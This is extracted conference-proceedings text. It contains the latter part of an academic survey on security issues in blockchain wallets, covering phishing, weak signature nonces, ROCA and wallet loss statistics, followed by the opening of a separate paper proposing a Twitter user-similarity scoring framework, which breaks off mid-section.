valued United States (US) $1.4B have been stolen in just five months of the year 2020
[20]. It turns our focus towards key management and security in cryptocurrencies.
A blockchain wallet holds public as well as private keys in asymmetric key model
of security. According to Jokić et al., the wallets have majorly two categories viz.
cold wallets and hot wallets, which can be further categorized as online wallets,
hardware wallets, paper wallets, mobile wallets and desktop wallets; each of them
possess their own set of merits and demerits [16].
There are several methods proposed for security, storage and management of
private key in these wallets. An intruder can use any method like weak encryption,
channel attack, brute force, replay attack, etc. to know keys and to get access to
targeted system. So, PKI infrastructure can never be secured till its keys are preserved.

2.2 Wallet Vulnerabilities

Almost all available wallets backup private keys as mnemonics which are hard for
user to remember. To remember them, a person has to write his private key mnemonic
on a paper which is inconvenient and insecure way. Rezaeighaleh and Zouhave
presented a backup scheme for hardware wallet using which one can transfer private
key from one wallet to other using an entrusted terminal [21]. This strategy creates
two wallets with same keys and provides opportunity for user to use one as main
wallet and other as backup wallet.
Blockchain itself is facing a lot of security issues [22]. But blockchain wallets are
the easiest and main pray for attackers. People always rely and trust on blockchain
security, overseeing its benefits and overlooking its weaknesses. Cybercriminals can
use traditional hacking methods for attacking wallets, or they can go ahead to find
and explore new ways to get access for private key [23]. This section mainly focuses
on such users’ vulnerabilities for wallets in blockchain, as enunciated below:
Analysis of Security Issues in Blockchain Wallet 785

Phishing Attack: It is a social engineering attack which is usually used by


cybercriminals to imitate like user and making fraud money transfers using wallet
address [24]. Attacker goal is to steal information like users’ domain names and
other login credentials for masquerading as real user. In 2018, there was a phishing
campaign which used IOTA wallets (Internet of Things Association (IOTA) wallets),
which steal an amount of US$4 million [25].
Dictionary Attacks: It is a brute force method to crack password by trying each
word of a dictionary. In blockchain, the dictionary attack can be used by cyber-
criminals to search private key of user and using them to find wallet credentials
[25].
Vulnerable Signatures: Various algorithms like Elliptic Curve Digital Signature
Algorithm (ECDSA), Rivest–Shamir–Adleman (RSA), etc. are used by blockchain
network to create signature for users. These cryptographic algorithms generate
‘nounce’ (a random number) for each signature. Breitner and Heninger have proved
that there are chances that the attacker can compute private key used in signing if
nuance is not generated properly [26]. They have stated two reasons for behind it:
one is the shorter length of nounce than expected and other is the common Least
significant Bit (LSB) or Most Significant Bit (MSB) values.
ROCA: It is private key vulnerability in which the private key can be guessed
from its corresponding public key. As we know, blockchain use public–private key
cryptography for encrypting message and signing a transaction. ROCA has flawed
key generation system. Depending on the vulnerability of public keys, an algorithm
can be designed to crack private key without making much efforts [27].
Cold Wallet Vulnerabilities: Although there are very low chances of such attack,
it is also possible that hardware or cold wallets can be tempered by knowing the
wallet credentials and transaction timings, etc. Recently in 2019, a South Korean
cryptocurrency exchange agency Upbit had lost US$48.5 million cryptocurrency
while they were exchanging funds to a cold wallet. The security drawback of cold
wallets is that they lack backup and recovery [28].
Hot Wallet Vulnerabilities: Hot wallets are most prone to attacks. In these wallets,
keys are stored on online servers. These servers besides having stiffed security, have
more possibility of vulnerable attacks as compared to cold wallets [29].

2.3 Recent Progresses

During the consensus phase, it is very important to check the integrity and authen-
ticity of data as well as restricting false stations to enter to secure wallet. There are
many chances of attacks like phishing, hot wallet attacks, etc. in consensus phase.
Researchers have proposed various algorithms where they suggest layering system
implemented differently to protect wallet. Om Pal et al. have analysed the existing
PKI and the necessity of key management for wallet of blockchain [11]. For secure
group communication during consensus phase, a group key management (GKM)
scheme was proposed by them. Multi-layer system architecture was proposed and
786 Taruna and Rishabh

tested. It is assumed that upper layer nodes have been given more rights and privileges
while nodes at same level have same privileges.
Ganet al. have also presented double layered structure for blockchain with Central-
ized Certificate Authorities (CCA) has the power to store public keys and add IoT
node for inner layer, and inner nodes in turn can store public keys and add nodes for
outer layer [11, 29, 30]. Matsumoto and Reischuk have shown that any misconduct
in Certificate Authorities (CA) can be regulated by consensus of the nodes known as
Instant Karma PKI [31]. Guardtime approach suggested the use of Physical Unclon-
able Function (PUF) for identification of IoT devices by using physical properties of
the device for required output [32]. A distinctive public–private key pair is generated
using the output and these keys are then used in blockchain transactions. Although
there are too many layers suggested, attacker can still invade through them. Also,
these models require a lot of computation and hard to implement.
He et al. have presented a more secure, semi-trusted, portable social-network-
based wallet-management technique with advanced features of security, portability,
authentication and recovery [33]. They review related wallet management tools
presented in [34–37] to come up with a system design having more secure storage,
portable remote login on multiple devices, authentication without password, blind
wallet recovery, etc. The system model has four entities—User (U), Management
device (M), Proxy (P) and Central Server (C). M acts as representative of U and
memorize its sensitive data. P can be on any smart device using which user can
remotely login and perform a transaction. Performance analysis of the purposed
system proves enhanced security and fully functional wallet with little overhead and
time delay (in millisecond).
Ning Wang and others have proposed an algorithm to improve security [38]. The
method used by them secure the private key of blockchain by storing it using image
steganography technique. In their scheme, firstly private key is padded with some
random number then converted to binary matrix and later to minimize error during
transmission an error correction code is included. The system is proved to have high
robustness, transparency and hence high security. Various other researchers have
proposed techniques to combine steganography with cryptography to implement
key management in blockchain wallet [39–42].
Hosam presented fractal stenographic technique to secure blockchain wallet as
this hold keys which are used for purchasing and selling of coins, most importantly
user’s private key [43]. Boiangiu et al. have used fractal trees to hide private key.
A fractal is a complex image generated using iterations of a single formula using
different values in each iteration and the result of previous iteration [44].
Researches by Ma and Sun have taken the advantages of blockchain for decen-
tralization and stronger security in IOT where the problem in existing schemes of
key management depends upon centralized authentication [45]. On the other hand,
Tin et al. used these features of blockchain in dynamic wireless sensor networks
(WSNs) used in industrial IOT [46]. Comparison of various research work done by
researchers is mentioned in Table 1.
Zhu et al. introduced an architectural framework of high availability (HA)-eWallet
which is an online wallet [47]. They have adopted an active architectural scheme.
Analysis of Security Issues in Blockchain Wallet 787

Table 1 Comparison of related work


Author Proposed method Benefits Shortcomings
Om Pal et al. Group key management Security enhanced Lot of computational
[11] scheme resources required
Gan et al. [29] Two-layer blockchain Security enhanced High cost of
architecture implementation [50]
He et al. [33] Cryptocurrency wallet Low time delays, Full recovery of system
management system enhanced security and not possible
recovery in certain cases
Wang et al. Blockchain key storage Improve transparency, In case of signal attack,
[38] method based on image security and robustness private key cannot be
steganography of private key accurately extracted
Ma et al. [45] Group key management Efficient scheme for Base stations are not fully
scheme dynamic WSNs reliable
Osama and Hiding bitcoins in The proposed system is Transparency and
Hosam[43] steganographic fractals vigorous to many capacity are not
attacks like hardcopy considered
and image attacks
Zhu et al. [47] High availability-eWallet Higher availability than System failure in case of
(HA-eWallet) traditional online wallet all service units and
architecture recovery centre failure

The work of Engelmann et al. have two service units viz. a transaction gateway and
two storage units [48]. Fangdong Zhu propose three models viz. normal dual-master
model based on multi-signature technology as put forward by [49], where Fangdong
use 3 of 5 schemes i.e. generate 5 keys randomly and sign the transaction using
3 of them. The other 2 keys have been chosen and encrypted randomly and then
sent to transaction gateway separately. These keys are stored in storage units and all
the data should be backed periodically to ‘disaster recovery center’. The other two
models Simplex and Recovery model are used in case of one or both storage units’
failure, respectively. Authors guaranteed the smooth and secure functioning of the
architecture till loss of 50% of user’s private keys in total [50].

3 Comparative Analysis

The above literature study reveals that making private key more secure is the most
effective way to protect the wallet from hackers and attackers. In this section, we will
analyses benefits and shortcomings of some of them to find a best solution ahead.
Comparison of related research work done by researchers is mentioned in Table 1.
Various new items and research reports reflect that the loss due to breach of crypto-
systems is enormous [51–53, 54]. As per these reports, the cryptocurrency crimes
have surpassed a figure of US$ 1.36 billion in five months till May 2020 alone. It
is predicted to be the second highest crime year in terms of cryptocurrencies. Last
788 Taruna and Rishabh

Table 2 Data of crypto


Year Cryptocurrency loss due to crypto crimes (in
losses
US dollar)
2020 (till May) 1.36 Million
2019 4.5 Billion
2018 1.7 Billion
2017 266 Million
2016 242 Million

year in 2019, the total crypto losses due to hacks and frauds were recorded to be $4.5
billion as enunciated in Table 2.
Apart from it, there were two major losses in first three months of the year 2019
which result in just massive crypto loss [54]. As a specific event, one major loss is
in 2019 was noted when founder and CEO of a Canadian Cryptocurrency exchange
platform Mr Gerry Cotton’s sudden demise. As per the reports, it is speculated that
Cotton had printed client’s private keys and he used cold wallets to store them. This
incident puts a question on the security levels of cold wallets.
The Web-based study from Reuters states that in 2018, out of $1.7 billion digital
currency loses $950 million is just because of crypto exchanges and infrastructure
services like wallets [52]. Analysing the records of past five years from 2016 to May
2020 reveals that crypto crime losses move almost linearly during 2016 to 2017.
There is not much increase in crypto crimes, but from 2018 onwards, it seems to
increase exponentially. The Fig. 4 envisages the spike in number of crypto crimes
during past five years. Solid lines in the chart show complete year data and dotted
lines shows the data of current year till May 2020.

Fig. 4 Cryptocurrency loss due to crypto crimes


Analysis of Security Issues in Blockchain Wallet 789

4 Conclusion

Security and privacy issues go hand-in-hand. All transactions in blockchain involve


wallet private key. Therefore, securing wallet must be a prime concern to all wallet
holders. However, blockchain wallet security is a naïve area of research and not
much work has been done in this regime. The research paper has studied the work
done so far in the management and security of private key of blockchain wallet. The
analysis in Sect. 3 envisages that no work done so far is absolute and every research
suffer from serious inferiority. It is reported from this study that security and lack
of transparency are the serious concerns in this regime. Others issues involve too
complicated and costly implementation. None of models presented so far is practi-
cally implementable to improve security to much depth. The analysis of past years
records of cryptocurrency frauds and thefts shows an exponential curve which is
alarming and fetch urgent attention towards the security of blockchain wallet infras-
tructure. Therefore, this area is open offering challenge to researcher community. In
future, more research need to be carried out on private key storage and security.

Acknowledgements Acknowledgements and Reference heading should be left justified, bold, with
the first letter capitalized but have no numbers. Text below continues as normal.

References

1. Nakamoto, S. (2008). Bitcoin: A peer-to-peer electronic cash system.s


2. Sengupta, J., Ruj, S., & Bit, S. D. (2020). A Comprehensive survey on attacks, security issues
and Blockchain Solutions for IoT and IIoT. Journal of Network and Computer Applications,
149, 102481. ISSN 1084–8045.
3. Casino, F., Dasaklis, T. K., Patsakis, C. (2019). A systematic literature review of blockchain-
based applications: Current status, classification and open issues. Telematics and Informatics,
36, 55–81. ISSN 0736-5853.https://doi.org/10.1016/j.tele.2018.11.006
4. Mohanta, B. K., Jena, D., Panda, S. S., & Sobhanayak, S. (2019). Blockchain technology: A
survey on applications and security privacy challenges. Internet of Things, 8, 100107. ISSN
2542-6605.https://doi.org/10.1016/j.iot.2019.100107
5. Sisodiya, V. S., & Garg, H. (2020). A comprehensive study of Blockchain and its various
Applications. In 2020 International Conference on Power Electronics & IoT Applications in
Renewable Energy and its Control (PARC), Mathura, Uttar Pradesh, India (pp. 475–480).
https://doi.org/10.1109/PARC49193.2020.236659
6. “COinMarketCap. https://coinmarketcap.com/all/views/all/. Accessed on Oct. 21, 2020.
7. Taylor, P. J., Dargahi, T., Dehghantanha, A., Parizi, R. M., Raymond Choo, K.-K. (2020).
Systematic literature review of blockchain cyber security. Digital Communications and
Networks, 6(2), 147–156, ISSN 2352-8648. https://doi.org/10.1016/j.dcan.2019.01.005
8. “Blockchain Edify”. https://blockchainedify.com/2020/09/26/what-is-blockchain-technology/
9. Ghimire, S., & Selvaraj, H. (2018). A survey on bitcoin cryptocurrency and its mining. In 2018
26th International Conference on Systems Engineering (ICSEng), Sydney, Australia (pp. 1–6).
https://doi.org/10.1109/ICSENG.2018.8638208
790 Taruna and Rishabh

10. Rajput, S., Singh, A., Khurana, S., Bansal, T., & Shreshtha, S. (2019). Blockchain tech-
nology and cryptocurrenices. In 2019 Amity International Conference on Artificial Intelli-
gence (AICAI), Dubai, United Arab Emirates (pp. 909–912). https://doi.org/10.1109/AICAI.
2019.8701371
11. Pal, O., Alam, B., Thakur, V., & Singh, S. (2019). Key management for blockchain technology.
In ICT Express, ISSN 2405-9595. https://doi.org/10.1016/j.icte.2019.08.002
12. Sabah, S., Mahdi, N., & Majeed, I. (2019). The road to the blockchain technology: Concept
and types. Periodicals of Engineering and Natural Sciences (PEN) (Vol. 7, pp. 1821–1832),
Dec 2019. https://doi.org/10.21533/pen.v7i4.935
13. Conti, M., Sandeep Kumar, E., Lal, C., & Ruj, S. (2018). A survey on security and privacy
issues of bitcoin. In IEEE Communications Surveys & Tutorials (Vol. 20, No. 4, pp. 3416–3452),
Fourthquarter 2018. https://doi.org/10.1109/COMST.2018.2842460
14. Li, X., Jiang, P., Chen, T., Luo, X., & Wen, Q. A survey on the security of blockchain systems.
Future Generation Computer Systems, 107, 841–853. ISSN 0167-739X
15. Dasgupta, D., Shrein, J. M., & Gupta, K. D. (2019). A survey of blockchain from security
perspective. Journal of Banking and Financial Technology, 3, 1–17. https://doi.org/10.1007/
s42786-018-00002-6
16. Jokić, S., Cvetković, A. S., Adamović, S., Ristić, N., & Spalević, P. (2019). Comparative
analysis of cryptocurrency wallets vs traditional wallets. Proceedings of International Journal
for Economic Theory and Practice and Social Issues, Oct 2019, https://scindeks-clanci.ceon.
rs/data/pdf/0350-137X/2019/0350-137X1903065J.pdf
17. Latifa, E.-R., Ahemed, E. K. M., Mohamed, E. G., & Omar, A. Blockchain: bitcoin
wallet cryptography security, challenges and countermeasures. Journal of Internet Banking
and Commerce. https://www.icommercecentral.com/open-access/blockchain-bitcoin-wallet-
cryptography-security-challenges-and-countermeasures.php?aid=86561
18. Aydar, M., Cetin, S., Ayvaz, S., & Aygun, B. (2020). Private key encryption and recovery in
blockchain. Submitted on 9 Jul 2019 (v1), last revised 25 Jun 2020 (this version, v2).
19. Sun, S.-F., Au, M. H., Liu, J. K., & Yuen, T. H., (2017). RingCT 2.0: A compact accumulator-
based (linkable ring signature) protocol for blockchain cryptocurrency monero. In Proc. Eur.
Symp. Res. Comput. Secur. (pp. 456–474).
20. https://cointelegraph.com/news/14b-in-crypto-stolen-in-first-five-months-of-2020-says-cip
hertrace. Accessed on Oct. 21, 2020.
21. Rezaeighaleh, H., & Zou, C. C. (2019). New secure approach to backup cryptocurrency wallets.
In 2019 IEEE Global Communications Conference (GLOBECOM), Waikoloa, HI, USA (pp. 1–
6). https://doi.org/10.1109/GLOBECOM38437.2019.9014007
22. https://ledgerops.com/blog/2019-03-28-top-five-blockchain-security-issues-in-2019.
Accessed on Oct. 16, 2020.
23. Kaushal, P. K., Bagga, A., & Sobti, R. (2017). Evolution of bitcoin and security risk in bitcoin
wallets. In 2017 International Conference on Computer, Communications and Electronics
(Comptelix), Jaipur (pp. 172–177). https://doi.org/10.1109/COMPTELIX.2017.8003959
24. Wang, H., Wang, Y., Cao, Z., Li, Z., Xiong, G. (2019). An overview of blockchain security
analysis. In: X. Yun, et al. (eds.). Cyber Security. CNCERT 2018, Communications in Computer
and Information Science (Vol. 970). Springer. https://doi.org/10.1007/978-981-13-6621-5_5
25. https://www.bleepingcomputer.com/news/security/iota-cryptocurrency-users-lose-4-million-
in-clever-phishing-attack/#:~:text=A%20clever%20hacker%20made%20off,steal%20m
oney%20from%20users’%20accounts.Accessed on Oct. 23, 2020.
26. Breitner, J., Heninger, N. (2019). Biased Nonce sense: Lattice attacks against weak ECDSA
signatures in cryptocurrencies. In: I. Goldberg, T. Moore (eds.). Financial cryptography and
data security. FC 2019. Lecture Notes in Computer Science (Vol. 11598). Cham: Springer.
https://doi.org/10.1007/978-3-030-32101-7_1
27. https://www.internetsociety.org/blog/2017/11/roca-encryption-vulnerability. Accessed on Oct.
21, 2020.
28. https://www.zdnet.com/article/upbit-cryptocurrency-exchange-loses-48-5-million-to-hackers.
Accessed on Oct. 21, 2020.
Analysis of Security Issues in Blockchain Wallet 791

29. Gan, S. (2017). An IoT simulator in NS3 and a key based authentication architecture for IoT
devices using blockchain. Indian Institute of Technology, Kanpur (online). https://security.cse.
iitk.ac.in/node/240. Accessed on Oct. 21, 2020.
30. Salman, T., Zolanvari, M., Erbad, A., Jain, R., & Samaka, M. (2019). Security services using
blockchains: A state-of-the-art survey. In IEEE Communications Surveys & Tutorials (Vol. 21,
No. 1, pp. 858–880), Firstquarter. https://doi.org/10.1109/COMST.2018.2863956
31. Matsumoto, S., Reischuk, R. M. (2017). IKP: turning a PKI around with decentralized auto-
mated incentives. In 2017 IEEE Symposium on Security and Privacy, SP, San Jose, CA
(pp. 410–426).
32. Guardtime. (2017). Internet of Things authentication: A blockchain solution using SRAM phys-
ical unclonable functions (online). https://www.intrinsic-id.com/wpcontent/uploads/2017/05/
gt_KSIPUF-web-1611pdf. Accessed on Oct. 21, 2020.
33. He, S., et al. (2018). A social-network-based cryptocurrency wallet-management scheme. IEEE
Access, 6, 7654–7663. https://doi.org/10.1109/ACCESS.2018.2799385
34. Litke, P., & Stewart, J. (2014). Cryptocurrency-stealing malware landscape (Online). Available
https://www.secureworks.com/research/cryptocurrency-stealing-malware-landscape
35. M. Team. Multibit. Available: https://multibit.org. Accessed on Oct. 21, 2020.
36. Wuille. P. (2020).Bip32: Hierarchical deterministic wallets. Available: https://github.com/gen
jix/bips/blob/master/bip0032.md. Accessed on Oct. 2, 2020.
37. Vasek, M., Bonneau, J., Ryan Castellucci, C. K., & Moore, T. (2016). The Bitcoin brain drain:
A short paper on the use and abuse of Bitcoin brain wallets. In Financial Cryptography and
Data Security (Lecture Notes in Computer Science). New York, NY, USA: Springer.
38. Wang, N., Chen, Y., Yang, Y., Fang, Z. & Sun, Y. (2019). Blockchain private key storage
algorithm based on image information hiding. https://doi.org/10.1007/978-3-030-24268-8_50
39. Biswas, C., Gupta, U. D., & Haque, M. M. (2019). An efficient algorithm for confiden-
tiality, integrity and authentication using hybrid cryptography and steganography. In 2019
International Conference on Electrical, Computer and Communication Engineering (ECCE),
Cox’sBazar, Bangladesh (pp. 1–5). https://doi.org/10.1109/ECACE.2019.8679136
40. Rashmi, N., & Jyothi, K. (2018). An improved method for reversible data hiding steganography
combined with cryptography (pp. 81–84). https://doi.org/10.1109/ICISC.2018.8398946
41. Kumar, R., & Singh, N. (2020). A survey based on enhanced the security of image using the
combined techniques of steganography and cryptography (March 29, 2020). In Proceedings of
the International Conference on Innovative Computing & Communications (ICICC), Available
at SSRN: https://ssrn.com/abstract=3563571
42. Chauhan, S., Jyotsna, Kumar, J., & Doegar, A. (2017). Multiple layer text security using vari-
able block size cryptography and image steganography. In 2017 3rd International Conference
on Computational Intelligence & Communication Technology (CICT), Ghaziabad (pp. 1–7).
https://doi.org/10.1109/CIACT.2017.7977303
43. Hosam, O. (2018). Hiding bitcoins in steganographic fractals (pp. 512–519). https://doi.org/
10.1109/ISSPIT.2018.8642736
44. Boiangiu, C.-A., & Morosan, A., & Stan, M. (2015). Fractal objects in computer graphics.
45. Ma, H., & Sun, G. (2020). Blockchain-based group key management scheme in IoT. In D.
S. Huang, V. Bevilacqua, A. Hussain (eds.). Intelligent Computing Theories and Application.
ICIC 2020. Lecture Notes in Computer Science (Vol. 12463). Cham: Springer. https://doi.org/
10.1007/978-3-030-60799-9_39
46. Tian, Y., Wang, Z., Xiong, J., & Ma, J. (2020). A blockchain-based secure key management
scheme with trustworthiness in DWSNs. IEEE Transactions on Industrial Informatics, 16(9),
6193–6202. https://doi.org/10.1109/TII.2020.2965975
47. Zhu, F., et al. (2017). Trust your wallet: A new online wallet architecture for Bitcoin. In
2017 International Conference on Progress in Informatics and Computing (PIC), Nanjing
(pp. 307–311). https://doi.org/10.1109/PIC.2017.8359562
48. Engelmann, C., Scott, S. L., Leangsuksun, C., & He, X. (2008). Symmetric active/active high
availability for high-performance computing system services: Accomplishments and limita-
tions. In 2008 Eighth IEEE International Symposium on Cluster Computing and the Grid
(CCGRID) (pp. 813–818).
792 Taruna and Rishabh

49. Tschorsch, F., & Scheuermann, B. (2016). Bitcoin and beyond: A technical survey on decen-
tralized digital currencies. IEEE Communications Surveys & Tutorials, 18(3), 2084–2123.
50. Alqahtani, H., Kavakli-Thorne, M., & Kumar, G. (2019). Applications of Generative Adver-
sarial Networks (GANs): An updated Review. Arch Computat Methods Eng. https://doi.org/
10.1007/s11831-019-09388-y
51. https://ciphertrace.com/spring-2020-cryptocurrency-anti-money-laundering-report. Accessed
on Oct. 21, 2020.
52. https://in.reuters.com/article/us-crypto-currency-crime/cryptocurrency-thefts-scams-hit-1-7-
billion-in-2018-report-idINKCN1PN1SQ. Accessed on Oct. 17, 2020.
53. https://www.cnbc.com/2019/01/29/crime-still-plague-cryptocurrencies-as-1point7-billion-
was-stolen-last-year-.html. Accessed on Oct. 19.
A Contextual Framework to Find
Similarity Between Users on Twitter

Sonika Dahiya, Gaurav Kumar, and Arnav Yadav

Abstract Twitter is one of the most used social networking sites, and people usually
prefer to share about themselves, their views, and other things that they have an
interest on Twitter. The method proposed can be used by the average Twitter user
to find out their degree of similar they are to any other user on the platform. The
presented Framework finds similarity between any two users on Twitter dependent on
the eight parameters which are Mention Similarity, Common Interest, Topic and List
similarity, followers and following relationship similarity, retweets, likes, common
hashtags, and profile Similarity. Every parameter generates some score, and the score
of each parameter is not dependent on any other parameter score. Weightage has been
assigned to each parameter according to the score they are getting individually, and
the value of each weight lies between 0 and 1. Each parameter requires user data
that has been extracted using Twitter’s own API such as follower, retweet, like,
hashtag, etc. For each Twitter user, data of eight parameters are collected for 2019
October to 2020 October. The framework can be used for suggesting how similar two
users on Twitter are. The framework has been verified using datasets of five users,
and from these datasets, percentage similarity is being calculated. For finding the
effectiveness of the framework, the result of our case study was compared against a
survey of human judges consisting of 524 people and was found to be moderately
effective.

Keywords Similar interests · Parameters · Weights · Twitter · Similarity ·


Retweets · Hashtags · Twitter API · Profile · Social media

S. Dahiya
CSE Department, Delhi Technological University, Delhi 110042, India
G. Kumar (B) · A. Yadav
SE Department, Delhi Technological University, Delhi 110042, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 793
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_64
794 S. Dahiya et al.

1 Introduction

Nowadays, social networking platforms are an essential piece of everyone’s lives.


Among the various uses, most of the people use them for communication and for
remaining informative. Currently, Twitter is one of the most used and popular social
networking platforms. For getting information about friends, celebrities, or a com-
pany, they follow them and read their tweets. Currently, Twitter has 1.35 billion
registered users, and among them, 321 million are monthly active users; these users
are responsible for publishing 500 million tweets every single day. In the last ten
years, Twitter has gained a lot of popularity in comparison with different social net-
working sites because of the content that users post every day and the hidden and
pattern information.
A critical part of studying Twitter data goes into analyzing their views and behav-
ior. Computing similarity of users dependent on their posted content, interests, and
following and follower lists is a significant use of Twitter content examination. Find-
ing similarity between users can be used for security purposes and hiring users, and
governments can use this to find people who have bad intentions toward the privacy
of the general people by finding users with negative tendencies and character defects
by referring to other such users in the past. Companies can use this method to find
similar users and thus curate specific advertisements for those users. Individuals
could use it to find the degree of similarity to other users or users who are interested
in similar content and topics as them.
Previously done work relating to finding the similarity in Twitter users has focused
mainly on parameters like common interests, likes, and retweets. In this paper, a few
additional parameters have been added, such as follower and following relationship
similarity, mention similarity, common hashtags, profile similarity, common interest
and topic and list similarity. Each parameter is assigned a weighting factor which is
multiplied by the score calculated by each parameter. The weights are not decided
by the user itself; rather, they are based on the parameter score and are normalized
in the range of 0 to 1. These new parameters make this technique more effective in
computing similarity between users. The given framework asks the users to enter user
IDs and return their percentage similarity with the respective account. As we know,
user data and behavior change frequently, so the data collected for the parameters
were of the last one year using the Twitter API, from October 2019 to October 2020.
The proposed framework asks the user to enter a user ID and receive consequently
a percentage score of how similar they are to the entered user’s profile. It processes
similarly between users by the proposed similarity formula.
The next sections describe first the related work to the system especially in the field
of similarity between users on Twitter and an explanation for all eight parameters
and their formulas. The paper ends with a case study, evaluation of results, future
work, and conclusion. To find the effectiveness of the proposed methodology, the
result of the case study was compared against a survey which included 524 human
judges and was found to be 92.75 and 87.64% effective in the two cases studied.
A Contextual Framework to Find Similarity … 795

2 Related Work

The active research pertaining to Twitter revolves around clustering users with similar
interests. This can be utilized in various fields such as finding online communities,
finding people with similar interests, and personalizing and curating advertisements
for users. In the following section, major related work of last decade is discussed:
Goal et al. [1] formed a method of finding similar Twitter users using various
parameters such as social graph structure, the popularity of user, user interaction data,
and content analysis. The created framework is scalable to users with large active
followings and users with a small number of followers alike. Due to this scalability of
the framework, it can find similar users for a very large amount of users. A machine
learning-based framework was proposed, which was built on Hadoop. A dataset of
candidates was constructed using a cosine similarity algorithm based on a graph,
and then the candidates were ranked based on parameters using a logistic regression
model trained on Twitter data from previous years. In this paper, the methodology
only works between two users and is not yet scalable to large datasets.
Razis et al. [2] formed a method for finding similarity between users on the basis
of their content. The metrics used were based on the combination of the four param-
eters, which are: URLs, mentions, hashtags, and the URL domains mentioned in the
user’s tweets. For calculating their final metric, they used scores that they got from
the similarity metric. The two important factors used were “followers to follower”
and “tweet creation rate.” The major areas this paper deals with are rating how much
influence a particular user account has, introducing an ontology for sanctifying Twit-
ter entities and describing a framework that finds similar accounts and their relation
with other such accounts on Twitter. Some related parameter in addition to a few
new ones was used in this paper to compute similarity.
Vathi et al. [3] described that the methodology to find similar communities works
on a few similarity metrics based on the interactions users have on Twitter, such as:
the following relationship and shared content computed. For all the hashtags, vector
space model of TF-IDF weights is used. After combining all these similarity linearly,
they generate the total similarity score. Along with similarity scores, each parameter
is assigned a weight. The weights are multiplied to the score, and the summation of
these scores gives the total similarity score.
Kamath et al. [4] propose a method of computing account similarity on RealGraph
using cosine similarity. Diverse interaction data are taken in by RealGraph, and it
then tries to predict possible user interaction in the time to come. The prediction
scores calculated by RealGraph are interpreted as the strength of the connection,
which allows a wide range of applications to use RealGraph. Who To Follow (WTF)
is an application of RealGraph, which is used by Twitter to suggest similar users
based on common interests and connections among users.
Ghenawat et al. [5] are using a variety of signals to compute a similarity score and
then use MapReduce to process these signals. The MapReduce takes a group of input
key/value pairs and uses that to build a group of output key/value pairs. The library
of MapReduce conveys the computation as two separate functions: Map and Reduce.
796 S. Dahiya et al.

The user writes Map, which takes an input pair and produces a group of intermediate
key/value pairs. This gives their formula high scalability. They let the users decide
the weight assigned to each signal as they believe similarity is subjective. In this
paper, weights assigned to the parameters are not decided by the user; instead, they
are based on the score value for each parameter.

3 Proposed Framework

After seeing the users following, followers, tweets, retweets, users’ interest, and some
other parameters, a framework has been devised to quantify the similarity between the
users. This section will describe all the parameter formulas for computing similarity
between two users: the first being the input user and the other known as the test user.
Every parameter has its respective formula to calculate the parameter score.
For every parameter score, weightage has been assigned between 0 and 1, accord-
ing to the scores that the input user and test user are getting using the formula. The
weights are then multiplied with their respective scores, and the summation gives us
the total similarity score. Using this score, we then find the percentage similarity of
the input user to the test user. Table 1 shows all the parameters that are being used
to find similarity and their definition. The following section describes the proposed
framework in further detail.

3.1 Parameter Weights

For every parameter, weight is assigned as each parameter does not have equal
importance in calculating the similarity score; for example, as likes are the most
common activity, its weight is comparatively low as it is not a very good indicator of
similarity. The weight is assigned to the parameter based on the parameter similarity
scores they get, respectively. The weights are not dependent on any other thing; they
depend only on the score that the parameter gets.
The value of the weight lies between zero and one, and the reason for taking a
weight value between zero and one is so the weight does not affect the final score
very much. If the weight is one, this means this weight has more weightage compared
to all the parameters, and if the weight is zero, it means it has very little weightage.
Weights will change according to the scores as they will get updated as the data get
updated.
Table 1 Formula used for each parameter similarity computation
Name Formula Explanation
Following and follower Sim r elationshi p (Ai , A j ) =
⎧ p is the number of the Ai ’s followers, and q is the number of
relationship similarity ⎪
⎨1 if test user appears in one list Ai ’s following
2 if test user appears in one lists (2)

⎩p+q if test user appears in all lists
Mention similarity Simmention (Ai , A j ) = TwtsThrd: function that returns the total count of tweets in a
w TwtsThrd(A , A )
i j 1 thread of tweets where Ai has mentioned A j . ThrdTot: count
× (3)
l=1 Thrdtot(Ai , A j ) accntsTot(l, Ai ) of total tweets in given thread. accntsTot: gives the total count
of users in the selected thread. w is the total number of threads
taken into consideration.
Retweets similarity SimRetwt (Ai , A j ) = NoTwtsInRetwtList(Ai , A j ) (4) Is the number of tweet that Ai retweeted of A j
A Contextual Framework to Find Similarity …

Like similarity SimLike (Ai , A j ) = NoTwtsInLikeList(Ai , A j ) (5) Is the number of tweet that Ai liked of A j
w 1
SimHashtag (Ai , A j ) =
l=1 1 + Hashset(Ai , A j , Hl )
Common hashtag used (6) P gives the count of positive tweet that user has on hashtag. N
Hashset(Ai , A j , H ) = |N U T (Ai , H )NUT(A j , H )|+
gives the count of negative tweet that user has on hashtag.
|N (Ai , H )N (A j , H )| + |P(Ai , H )P(A j , H )| NUT gives the count of neutral tweet on the common hashtags.
w gives the count of total hashtags that Ai and A j have both
used in their tweets.
Common interest SimInterest (Ai , A j ) = count(ints(Ai ) ∩ (ints(A j )) (7) Ints does an analysis and gives the top five interests of the users

⎪Gender(Ai )is equal to gender(A j )+

Profile similarity SimProfile = language(Ai )is equal to language(A j )+ (8) Gender gives the gender of the user. Language gives the

i
⎩location(A )is equal to location(A )
j
language of the user and Location—where the user is located
Topic and list similarity SimTopic (Ai , A j ) = numOfTopicandList(Ai , A j ) (9) numofSimTopic(Ai ,A j ) is the number of common topics
followed by both Ai and A j
797
798 S. Dahiya et al.

3.2 Parameter Normalization

As all parameter similarity scores vary in different ranges, they have been rescaled
to make all the elements lie between 0 and 1, thus bringing all the values of numeric
columns in the dataset to a common scale. This made the scores more consistent so
that the effect of each score would be about the same and would depend majorly on
the weights of each parameter. This is a technique used to reduce data redundancy
and eliminate undesirable characteristics. The formula being used for normalization
is as follows:
(x − min(k)) × (max( j) − min( j))
y= + min( j) (1)
max(k) − min(k)

where
X is the value that is to be normalized.
min(k) is smallest value in the dataset.
max(k) is the maximum value in the dataset.
min( j) is the normalization range’s minimum value.
max( j) is the normalization range’s maximum value.
1. In this framework, the value of x is the score that came after applying parameter
formula individually, min(k) is smallest value for individual parameter data, max(k)
is largest value for each parameter, max(j) is 10, and min(j) is 0.

3.3 Formulation of Similarity Computation


8
SimTotal (Ai , A j ) = (Simm (Ai , A j ) × weightm )
m=1
Input User (Ai ) − User whose similarity has to be found.
Test User (A j ) − User to whom the similarity is being found.
Simm − Score produced by m th parameter for users Ai and A j .

3.4 Parameters Used

